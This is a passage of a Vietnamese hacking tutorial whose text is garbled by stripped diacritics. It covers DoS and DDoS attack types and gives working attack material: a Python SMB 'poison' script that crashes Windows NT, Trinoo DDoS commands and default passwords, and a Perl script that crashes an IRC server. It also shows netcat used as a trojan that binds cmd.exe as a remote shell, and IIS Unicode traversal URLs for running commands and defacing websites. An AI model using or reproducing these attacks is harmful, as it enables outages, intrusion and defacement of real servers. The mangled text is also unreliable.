chng b ngng hot ng, crash hoc reboot. Nh vy, ch cn gi mtlng nh cc gi tin ICMP packets i th h thng mng khuch i skhuch i lng gi tin ICMP packets ny ln gp bI . T l khuch i

ph thuc vo s mng tnh c trong mng khuch I . Nhim v ca cchacker l c chim c cng nhiu h thng mng hoc routers cho phpchuyn trc tip cc gi tin n a ch broadcast khng qua ch lc a chngun cc u ra ca gi tin . C c cc h thng ny, hacker s ddng tin hnh Smurf Attack trn cc h thng cn tn cng . == > mt mylm chng si nh , chc my chm li ta nh cho thua .

g . ) UDP Flooding :

_ Cch tn cng UDP i hi phi c 2 h thng my cng tham gia.Hackers s lm cho h thng ca mnh i vo mt vng lp trao i cc dliu qua giao thc UDP. V gi mo a ch ip ca cc gi tin l a chloopback ( 127.0.0.1 ) , ri gi gi tin ny n h thng ca nn nhn trncng UDP echo ( 7 ). H thng ca nn nhn s tr li li cc messages do127.0.0.1( chnh n ) gi n , kt qu l n s i vng mt vng lp v tn.Tuy nhin, c nhiu h thng khng cho dng a ch loopback nn hacker

s gi mo mt a ch ip ca mt my tnh no trn mng nn nhn vtin hnh ngp lt UDP trn h thng ca nn nhn . Nu bn lm cch nykhng thnh cng th chnh my ca bn s b y .

h . ) Tn cng DNS :

_ Hacker c th i mt li vo trn Domain Name Server ca h thng nn


42/59

nhn ri cho ch n mt website no ca hacker. Khi my khch yu cuDNS phn tch a ch b xm nhp thnh a ch ip, lp tc DNS ( bhacker thay i cache tm thI ) s i thnh a ch ip m hacker cho chn . Kt qu l thay v phi vo trang Web mun vo th cc nn nhn svo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch vtht hu hiu !.

g . ) Distributed DoS Attacks ( DDos ) :

_ DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cchackers s c thm nhp vo cc mng my tnh c bo mt km, sau ci ln cc h thng ny chng trnh DDoS server. By gi cc hackers shn nhau n thi gian nh s dng DDoS client kt ni n cc DDoSservers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn

cng DDoS n h thng nn nhn .

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :

_ y c l l kiu tn cng li hi nht v lm boot my tnh ca iphng nhanh gn nht . Cch lm th cng tng t nh DDos nhng thayv tn cng bng nhiu my tnh th ngI tn cng ch cn dng mt mytn cng thng qua cc server ln trn th gii . Vn vi phng php gimo a ch IP ca victim , k tn cng s gi cc gi tin n cc server

mnh nht , nhanh nht v c ng truyn rng nht nh Yahoo .v.v ,cc server ny s phn hi cc gi tin n a ch ca victim . Vic cngmt lc nhn c nhiu gi tin thng qua cc server ln ny s nhanhchng lm nghn ng truyn ca my tnh nn nhn v lm crash , rebootmy tnh . Cch tn cng ny li hi ch ch cn mt my c kt niInternet n gin vi ng truyn bnh thng cng c th nh bt ch thng c ng truyn tt nht th giI nu nh ta khng kp ngn chn .Trang Web HVA ca chng ta cng b DoS va ri bi cch tn cng nyy .

40 . ) K thut DoS Web bng Python :

_ K thut ny ch c th s dng duy nht trn WinNT , v bn cn phi cthi gian th my tnh ca nn nhn mi b down c .

_ Bn hy download Pyphon ti http://www.python.org/ s dng ._ Bn hy save on m sau ln file rfpoison.py .
http://www.python.org/http://www.python.org/


43/59

CODEimport stringimport structfrom socket import *import sysdef a2b(s):

bytes = map(lambda x: string.atoi(x, 16),string.split(s))data = string.join(map(chr, bytes), `)return datadef b2a(s):

bytes = map(lambda x: `%.2x` % x, map(ord, s))return string.join(bytes, ` `)

# Yu cu tp hp NBSSnbss_session = a2b(``````81 00 00 48 20 43 4b 46 44 454e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 4341 43 41 43 41 43 41 43 41 43 41 00 20 45 48 4542 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 4643 43 41 43 41 43 41 43 41 43 41 41 41 00 00 0000 00``````)

# To SMBcrud = (# Yu cu SMBnegprot``````ff 53 4d 42 72 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 4320 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20

4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 3000 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00``````,


44/59

# Yu cu setup SMB X``````ff 53 4d 42 73 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ffff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 0000 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f55 50 00 55 6e 69 78 00 53 61 6d 62 61 00``````,# Yu cu SMBtconX``````ff 53 4d 42 75 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00

00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 5645 52 5c 49 50 43 24 00 49 50 43 00``````,# Yu cu khI to SMBnt X``````ff 53 4d 42 a2 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 0007 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00

00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 0000 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 7276 73 76 63 00``````,# yu cu bin dch SMB``````ff 53 4d 42 25 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 0000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c

00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 4950 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 0000 00 01 00 00 00 30 16 30 16 00 00 00 00 01 0000 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 785a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1cc9 11 9f e8 08 00 2b 10 48 60 02 00 00 00``````,


45/59

# SMBtrans Request``````ff 53 4d 42 25 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 0000 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 4950 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 0000 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 0000 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 005c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 0056 00 45 00 52 00 00 00 00 00 01 00 00 00 01 0000 00 00 00 00 00 ff ff ff ff 00 00 00 00``````

)crud = map(a2b, crud)def smb_send(sock, data, type=0, flags=0):d = struct.pack(`!BBH`, type, flags, len(data))#print send:`, b2a(d+data)sock.send(d+data)def smb_recv(sock):s = sock.recv(4)assert(len(s) == 4)

type, flags, length = struct.unpack(`!BBH`, s)data = sock.recv(length)assert(len(data) == length)#print recv:`, b2a(s+data)return type, flags, datadef nbss_send(sock, data):sock.send(data)def nbss_recv(sock):s = sock.recv(4)assert(len(s) == 4)

return sdef main(host, port=139):s = socket(AF_INET, SOCK_STREAM)s.connect(host, port)nbss_send(s, nbss_session)nbss_recv(s)for msg in crud[:-1]:


46/59

smb_send(s, msg)smb_recv(s)smb_send(s, crud[-1]) # no response to thiss.close()if __name__ == `__main__`:

print `Sending poison...`,main(sys.argv[1])

print `done.`

c th lm down c server ca i phng bn cn phi c thi gianDoS , nu khng c iu kin ch i tt nht bn khng nn s dng cchny . Nhng vc th cho bit th c ng khng ?

41 . ) Tn cng DDoS thng qua Trinoo :

_ Bn bit DDoS attack l g ri phi khng ? Mt cuc tn cng DDoSbng Trinoo c thc hin bi mt kt ni ca Hacker Trinoo Master vch dn cho Master pht ng mt cuc tn cng DDoS n mt haynhiu mc tiu. Trinoo Master s lin lc vi nhng Deadmons a nhnga ch c dn n tn cng mt hay nhiu mc tiu trong khong thigian xc nh .

_ C Master v Deamon u c bo v bng Passwd . ch khi chng ta

bit passwd th mi c th iu khin c chng , iu ny khng c g khkhn nu chng ta l ch nhn thc s ca chng . Nhng passwd nythng c m ho v bn c th thit lp khi bin dch Trinoo t Source----- > Binnary. Khi c chy , Deadmons s hin ra mt du nhc v ch

passwd nhp vo , nu passwd nhp sai n s t ng thot cn nu passwdc nhp ng th n s t ng chy trn nn ca h thng .

attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1

Escape character is `^]`.kwijiboConnection closed by foreign host. < == Bn nhp sai

attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1


47/59

Connected to 10.0.0.1Escape character is `^]`.

betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]trinoo > < == bn vo c h thng trinoo

_ y l vi passwd mc nh :

l44adsl``: pass ca trinoo daemon .``gorave``: passwd ca trinoo master server khi startup .``betaalmostdone``: passwd iu khin t xa chung cho trinoo master .``killme``: passwd trinoo master iu khin lnh ``mdie`` .

_ y l mt s lnh dng iu khin Master Server:

CODEdie------------------------------------------------ ------------Shutdown.quit----------------------------------------------- -------------Log off.mtimer N-------------------------------------------------- --t thI gian tncng DoS , vI N nhn gi tr t 1-- > 1999 giy .dos IP------------------------------------------------- ------Tn cng n mt ach IP xc nh .

mdie pass----------------------------------------------- ----V hiu ho tt c ccBroadcast , nu nh passwd chnh xc . Mt lnh c gi ti (``d1el44adsl``) Broadcast Shutdown chng . Mt passwd ring bit s c tcho mc nymping---------------------------------------------- ----------Gi mt lnh ping ti(``png l44adsl``) cc Broadcast.mdos ------------------------------------------Send nhiu lnh DOS (``xyzl44adsl 123:ip1:ip2``) n cc Broadcast.info----------------------------------------------- --------------Hin th thng tin vTrinoo .

msize---------------------------------------------- ------------t kch thc mcho nhng gi tin c send i trong sut thI gian DoS.nslookup host----------------------------------------------X c nh tn thit bca Host m Master Trinoo ang chy .usebackup------------------------------------------ ---------Chuyn tI cc fileBroadcast sao lu c to bi lnh killdead.

bcast---------------------------------------------- -------------Lit k danh sch tt


48/59

c cc Broadcast c th khai thc .help [cmd] --------------------------------------------------- a ra danh sch cclnh .mstop---------------------------------------------- -------------Ngng li cc cuctn cng DOS .

_ y l mt s lnh dng iu khin Trinoo Deadmons:

CODEaaa pass IP------------------------------------------------- ---Tn cng n a chIP xc nh . GI gi tin UDP (0-65534) n cng ca UDP ca a chIP xc nh trong mt khong thi gian xc nh c mc nh l 120shay t 1-- > 1999 s .

bbb pass N-------------------------------------------------- ---t thI gian giihn cho cc cuc tn cng DOS .Shi pass----------------------------------------------- ---------Gi chui*HELLO* ti dnh sch Master Server c bin dch trong chngtrnh trn cng 31335/UDP.

png pass----------------------------------------------- --------Send chui PongtI Master Server pht hnh cc lnh iu khin trn cng 31335/UDP.die pass----------------------------------------------- ---------Shutdown Trinoo.rsz N-------------------------------------------------- ----------L kch thc ca b

m c dng tn cng , n c tnh bng byte .xyz pass 123:ip1:ip3---------------------------------------- tn cng DOS nhiumc tiu cng lc .

( Da theo hng dn ca huynh Binhnx2000 )Cn nhiu on m v cch ng dng DoS lm , cc bn chu kh tmhiu thm nh . Nhng ng tn cng lung tung , nht l server ca HVA ,coi chng khng thu c hiu qu m cn b lock nick na

Ht phn 6 He heNhng hiu bit c bn nht tr thnh Hacker -Phn 7

42 . ) K thut n cng DoS vo WircSrv Irc Server v5.07 :


49/59

WircSrv IRC l mt Server IRC thng dng trn Internet ,n s b Crash nunh b cc Hacker gi mt Packet ln hn gi tr ( 65000 k t ) cho phpn Port 6667.Bn c th thc hin vic ny bng cch Telnet n WircSrv trn Port 6667:Nu bn dng Unix:

[[email protected]$ telnet irc.example.com 6667Trying example.com...Connected to example.com.Escape character is `^]`.[buffer]

Windows cng tng t:

telnet irc.example.com 6667

Lu : [buffer] l Packet d liu tng ng vi 65000 k t .Tuy nhin , chng ta s crash n rt n gin bng on m sau ( Cc bnhy nhn vo on m v t mnh gii m nhng cu lnh trong , cngl mt trong nhng cch tp luyn cho s phn x ca cc hacker khi hnghin cu . No , chng ta hy phn tch n mt cch cn bn ):

CODE#!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trongperluse Getopt::Std;use Socket;getopts(`s:`, \%args);if(!defined($args{s})){&usage;}my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p a ddr,$proto);$foo = ``A``; # y l NOP$number = ``65000``; # y l tt c s NOP

$data .= $foo x $number; # kt qu ca $foo times $number$serv = $args{s}; # lnh iu khin server t xa$port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667$buf = ``$data``;$in_addr = (gethostbyname($serv))[4]



50/59

47.) Cc cng c cn thit hack Web :

i vi cc hacker chuyn nghip th h s khng cn s dng nhng cngc ny m h s trc tip setup phin bn m trang Web nn nhn s dngtrn my ca mnh test li . Nhng i vi cc bn mi vo ngh thnhng cng c ny rt cn thit , hy s dng chng mt vi ln bn s bitcch phi hp chng vic tm ra li trn cc trang Web nn nhn cnhanh chng nht . Sau y l mt s cng c bn cn phi c trn my lmn ca mnh : Cng c th 1 : Mt ci proxy dng che du IP v vttng la khi cn ( Cch to 1 ci Proxy ti by phn 7 , cc bn hy

xem li nh ) .Cng c th 2 : Bn cn c 1 shell account, ci ny thc s quan trng ivi bn . Mt shell account tt l 1 shell account cho php bn chy ccchng trnh chnh nh nslookup, host, dig, ping, traceroute, telnet, ssh,ftp,...v shell account cn phi ci chng trnh GCC ( rt quan trngtrong vic dch (compile) cc exploit c vit bng C) nh MinGW,Cygwin v cc dev tools khc.Shell account gn ging vi DOS shell,nhng n c nhiu cu lnh v chcnng hn DOS . Thng thng khi bn ci Unix th bn s c 1 shell

account, nu bn khng ci Unix th bn nn ng k trn mng 1 shellaccount free hoc nu c ai ci Unix v thit lp cho bn 1 shell accountth bn c th log vo telnet (Start -- > Run -- > g Telnet) dng shellaccount . Sau y l 1 s a ch bn c th ng k free shell account :http://www.freedomshell.com/http://www.cyberspace.org/shell.ht mlhttp://www.ultrashell.net/

Cng c th 3 : NMAP l Cng c qut cc nhanh v mnh. C th quttrn mng din rng v c bit tt i vi mng n l. NMAP gip bn

xem nhng dch v no ang chy trn server (services / ports : webserver ,ftpserver , pop3,...),server ang dng h iu hnh g,loi tng la mserver s dng,...v rt nhiu tnh nng khc.Ni chung NMAP h tr huht cc k thut qut nh : ICMP (ping aweep),IP protocol , Null scan , TCPSYN (half open),... NMAP c nh gi l cng c hng u ca ccHacker cng nh cc nh qun tr mng trn th gii.Mi thng tin v NMAP bn tham kho ti http://www.insecure.org/ .
http://www.freedomshell.com/http://www.cyberspace.org/shell.htmlhttp://www.ultrashell.net/http://www.insecure.org/http://www.freedomshell.com/http://www.cyberspace.org/shell.htmlhttp://www.ultrashell.net/http://www.insecure.org/


51/59

Cng c th 4 : Stealth HTTP Security Scanner l cng c qut li bo mttuyt vi trn Win32. N c th qut c hn 13000 li bo mt v nhndin c 5000 exploits khc.Cng c th 5 : IntelliTamper l cng c hin th cu trc ca mt Websitegm nhng th mc v file no, n c th lit k c c th mc v file cset password. Rt tin cho vic Hack Website v trc khi bn Hack mtWebsite th bn phi nm mt s thng tin ca Admin v Website .Cng c th 6 : Netcat l cng c c v ghi d liu qua mng thng quagiao thc TCP hoc UDP. Bn c th dng Netcat 1 cch trc tip hoc sdng chng trnh script khc iu khin Netcat. Netcat c coi nh 1exploitation tool do n c th to c lin kt gia bn v server cho vicc v ghi d liu ( tt nhin l khi Netcat c ci trn 1 server b lI ).Mi thng tin v Netcat bn c th tham kho ti http://www.l0pht.com/ .Cng c th 7 : Active Perl l cng c c cc file Perl ui *.pl v cc

exploit thng c vit bng Perl . N cn c s dng thi hnh cclnh thng qua cc file *.pl .Cng c th 8 : Linux l h iu hnh hu ht cc hacker u s dng.Cng c th 9 : L0phtCrack l cng c s mt Crack Password caWindows NT/2000 .Cch Download ti by ri nn khng ni y , cc bn khi Downloadnh ch n cc phin bn ca chng , phin bn no c s ln nht thcc bn hy Down v m si v n s c thm mt s tnh nng m cc phin

bn trc cha c . Nu down v m cc bn khng bit s dng th tm li

cc bi vit c c hng dn bn Box ngh . Nu vn khng thy thc post bi hi , cc bn bn s tr li cho bn .

48.) Hng dn s dng Netcat :

a . ) Gii thiu : Netcat l mt cng c khng th thiu c nu bn munhack mt website no v n rt mnh v tin dng . Do bn cn bitmt cht v Netcat .

b . ) Bin dch :_ i vi bn Netcat cho Linux, bn phi bin dch n trc khi s dng.

- hiu chnh file netcat.c bng vi: vi netcat.c+ tm dng res_init(); trong main() v thm vo trc 2 du ``/``: //res_init();+ thm 2 dng sau vo phn #define (nm u file):

#define GAPING_SECURITY_HOLE#define TELNET
http://www.l0pht.com/http://www.l0pht.com/


52/59

- bin dch: make linux- chy th: ./nc -h- nu bn mun chy Netcat bng nc thay cho ./nc, bn ch cn hiu chnh li

bin mi trng PATH trong file ~/.bashrc, thm vo ` :.``PATH=/sbin:/usr/sbin:...:.

_ Bn Netcat cho Win khng cn phi compile v c sn file nh phnnc.exe. Ch vy gii nn v chy l xong.c . ) Cc ty chn ca Netcat :

_ Netcat chy ch dng lnh. Bn chy nc -h bit cc tham s:

CODEC:\ > nc -hconnect to somewhere: nc [-options] hostname port [ports] ...

listen for inbound: nc -l -p port [options] [hostname] [port]options:-d ----------- tch Netcat khi ca s lnh hay l console, Netcat s chy ch steath(khng hin th trn thanh Taskbar)-e prog --- thi hnh chng trnh prog, thng dng trong ch lng nghe-h ----------- gi hng dn-i secs ----- tr hon secs mili giy trc khi gi mt dng d liu i-l ------------- t Netcat vo ch lng nghe ch cc kt ni n-L ------------ buc Netcat ``c`` lng nghe. N s lng nghe tr li sau mi

khi ngt mt kt ni.-n ------------ ch dng a ch IP dng s, chng hn nh 192.168.16.7,Netcat s khng thm vn DNS-o ------------ file ghi nht k vo file-p port ----- ch nh cng port-r yu cu Netcat chn cng ngu nhin(random)-s addr ----- gi mo a ch IP ngun l addr-t ------------- khng gi cc thng tin ph i trong mt phin telnet. Khi bntelnet n mt telnet daemon(telnetd), telnetd thng yu cu trnh telnetclient ca bn gi n cc thng tin ph nh bin mi trng TERM, USER.

Nu bn s dng netcat vi ty chn -t telnet, netcat s khng gi ccthng tin ny n telnetd.-u ------------- dng UDP(mc nh netcat dng TCP)-v ------------- hin th chi tit cc thng tin v kt ni hin ti.-vv ----------- s hin th thng tin chi tit hn na.-w secs ---- t thi gian timeout cho mi kt ni l secs mili giy-z ------------- ch zero I/O, thng c s dng khi scan port


53/59

Netcat h tr phm vi cho s hiu cng. C php l cng1-cng2. V d: 1-8080 ngha l 1,2,3,..,8080

d . ) Tm hiu Netcat qua cc VD :

_ Chp banner ca web server :

V d: nc n 172.16.84.2, cng 80

CODEC:\ > nc 172.16.84.2 80HEAD / HTTP/1.0 (ti y bn g Enter 2 ln)

HTTP/1.1 200 OKDate: Sat, 05 Feb 2000 20:51:37 GMTServer: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk)mod_ssl/2.8.2OpenSSL/0.9.6 PHP/4.0.4pl1Connection: closeContent-Type: text/html

bit thng tin chi tit v kt ni, bn c th dng v ( -vv scho bit cc thng tin chi tit hn na)

C:\ > nc -vv 172.16.84.1 80

CODE172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA(UNKNOWN) [172.16.84.1] 80 (?) openHEAD / HTTP/1.0HTTP/1.1 200 OK

Date: Fri, 04 Feb 2000 14:46:43 GMTServer: Apache/1.3.20 (Win32)Last-Modified: Thu, 03 Feb 2000 20:54:02 GMTETag: ``0-cec-3899eaea``Accept-Ranges: bytesContent-Length: 3308Connection: close


54/59

Content-Type: text/htmlsent 17, rcvd 245: NOTSOCK

Nu mun ghi nht k, hy dng -o . V d:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem th n ghi nhng g nh :

CODE< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1200 OK.< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri,

04 F< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 200014:50:54< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #GMT..Server: Ap< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20(Win< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi

< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03Feb< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 200020:54:02 GM< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag:``0-cec-< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 #3899eaea``..Accep< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges:

bytes.

< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #3308..Connectio< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n:close..Conten< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type:


55/59

text/htm< 000000f0 6c 0d 0a 0d 0a # l....

du < ngha l server gi n netcatdu > ngha l netcat gi n server

_ Qut cng :Bn hy chy netcat vi ty chn z . Nhng qut cng nhanh hn, bnhy dng -n v netcat s khng cn thm vn DNS. V d scan cc cngTCP(1- > 500) ca host 172.16.106.1

CODE[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500

(UNKNOWN) [172.16.106.1] 443 (?) open(UNKNOWN) [172.16.106.1] 139 (?) open(UNKNOWN) [172.16.106.1] 111 (?) open(UNKNOWN) [172.16.106.1] 80 (?) open(UNKNOWN) [172.16.106.1] 23 (?) open

nu bn cn scan cc cng UDP, dng -u

CODE[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500(UNKNOWN) [172.16.106.1] 1025 (?) open(UNKNOWN) [172.16.106.1] 1024 (?) open(UNKNOWN) [172.16.106.1] 138 (?) open(UNKNOWN) [172.16.106.1] 137 (?) open(UNKNOWN) [172.16.106.1] 123 (?) open(UNKNOWN) [172.16.106.1] 111 (?) open

_ Bin Netcat thnh mt trojan :Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe,dng ty chn l ( listen ) v -p port xc nh s hiu cng cn lng nghe,-e yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng lshell lnh cmd.exe ( i vi NT) hoc /bin/sh(i vi Unix). V d:

CODE


56/59

E:\ > nc -nvv -l -p 8080 -e cmd.exelistening on [any] 8080 ...connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159sent 0, rcvd 0: unknown socket error

Trn my tnh dng tn cng, bn ch vic dng netcat ni n my nnnhn trn cng nh, chng hn nh 8080

CODEC:\ > nc -nvv 172.16.84.2 8080(UNKNOWN) [172.16.84.2] 8080 (?) openMicrosoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-1999 Microsoft Corp.

E:\ > cd testcd testE:\test > dir /wdir /wVolume in drive E has no label.Volume Serial Number is B465-452FDirectory of E:\test[.] [..] head.log NETUSERS.EXE NetView.exentcrash.zip password.txt pwdump.exe

6 File(s) 262,499 bytes2 Dir(s) 191,488,000 bytes freeC:\test > exitexitsent 20, rcvd 450: NOTSOCK

Nh cc bn thy , ta c th lm nhng g trn my ca nn nhn ri , chcn mt s lnh c bn , ta chim c my tnh ca i phng , cc

bn hy xem tip nh :

CODEE:\ > nc -nvv -L -p 8080 -e cmd.exelistening on [any] 8080 ...??


57/59

Ring i vi Netcat cho Win, bn c th lng nghe ngay trn cng anglng nghe. Ch cn ch nh a ch ngun l -s .V d:

CODEnetstat -a...TCP nan_nhan:domain nan_nhan:0 LISTENING nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lng nghe ngay trncng 53listening on [172.16.84.1] 53 ...connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163??

Trn Windows NT, t Netcat ch lng nghe, khng cn phi cquyn Administrator, ch cn login vo vi 1 username bnh thng khing Netcat l xong.Ch : bn khng th chy netcat vi ... -u -e cmd.exe... hoc ...-u -e/bin/sh... v netcat s khng lm vic ng. Nu bn mun c mt UDP shelltrn Unix, hy dng udpshell thay cho netcat.

( Da theo bi vit ca huynh Vicky )49.) K thut hack IIS server 5.0 :

_ IIS server vi cc phin bn t trc n phin bn 5.0 u c li ta cth khai thc , do by gi hu ht mi ngi u dng IIS server 5.0 nn li cc phin bn trc ti khng cp n . By gi ti s by cc bn cchhack thng qua cng c activeperl v IE , cc bn c th vn dng cho cctrang Web VN v chng b li ny rt nhiu . Ta hy bt u nh .

_ Trc ht cc bn hy download activeperl v Unicode.pl .

_ S dng telnet xc nh trang Web ta tn cng c s dng IIS server 5.0hay khng :

CODEtelnet < tn trang Web > 80GET HEAD / HTTP/1.0


58/59

Nu n khng bo cho ta bit mc tiu ang s dng chng trnh g th ccbn hy thay i cng 80 bng cc cng khc nh 8080, 81, 8000, 8001.v.v

_ Sau khi xc nh c mc tiu cc bn vo DOS g :

CODEperl unicode.plHost: ( g a ch server m cc bn mun hack )Port: 80 ( hoc 8080, 81, 8000, 8001 tu theo cng m ta telnet trc ).

_ Cc bn s thy bng lit k li ( c lp trnh trong Unicode.pl ) nh

sau :

CODE[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+

[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af../winnt/system32/cmd.exe?/c+[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+


59/59

[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Cc bn s thy c tt c cc li trn nu trang Web nn nhn b tt cnhng li nh vy , nu server ca nn nhn ch b li th 13 v 17 th bngkt qu ch xut hin dng th 13 v 17 m thi .Ti ly VD l bng kt qu cho ti bit trang Web nn nhn b li th 3 v7 , ti s ra IE v nhp on m tng ng trn Address :

http://www.xxx.com/scripts/..%c1%p c../winnt/system32/cmd.exe?/c+ < ==li dng th 3

hochttp://www.xxx.com/scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+ < ==li dng th 7

n y cc bn c th xm nhp vo server ca nn nhn ri , ccbn hy s dng lnh trong DOS m khai thc thng tin trong ny . Thngthng cc trang Web nm th mc vinetpub\wwwroot , cc bn vo crI th ch cn thay index.html vI tn hack by . L c ri , ng quyh nh .

GOOKLUCK!!!!!!!!!!!!!!!

( Ht phn 8 )AnhdendayHVAonline
http://www.xxx.com/scripts/..%C3%81%25pc../winnt/s%20ystem32/cmd.exe?/c+http://www.xxx.com/scripts/..%C3%81%1C../winnt/s%20ystem32/cmd.exe?/c+http://www.xxx.com/scripts/..%C3%81%25pc../winnt/s%20ystem32/cmd.exe?/c+http://www.xxx.com/scripts/..%C3%81%1C../winnt/s%20ystem32/cmd.exe?/c+

tài liệu hacker

Documents